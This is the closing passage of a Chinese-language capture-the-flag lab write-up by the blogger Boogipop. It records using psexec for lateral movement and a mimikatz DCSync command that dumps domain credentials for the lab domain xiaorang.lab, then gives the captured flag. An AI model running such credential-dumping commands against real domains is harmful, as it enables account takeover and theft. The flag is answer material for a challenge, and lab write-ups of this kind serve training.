29 b0aa1ed6b84d876eb160b8f30c5b40a4

然后psexec登上去捏
image.png
拿下捏

Flag3

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab" >7.log
在lumia用户有个secret.zip,纯纯misc我就不做了。。。
时间就是金钱啊!
flag{cf0c753c-233f-4729-8984-0746ea5878b7}

image.png

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#内网##Java##FastJson##private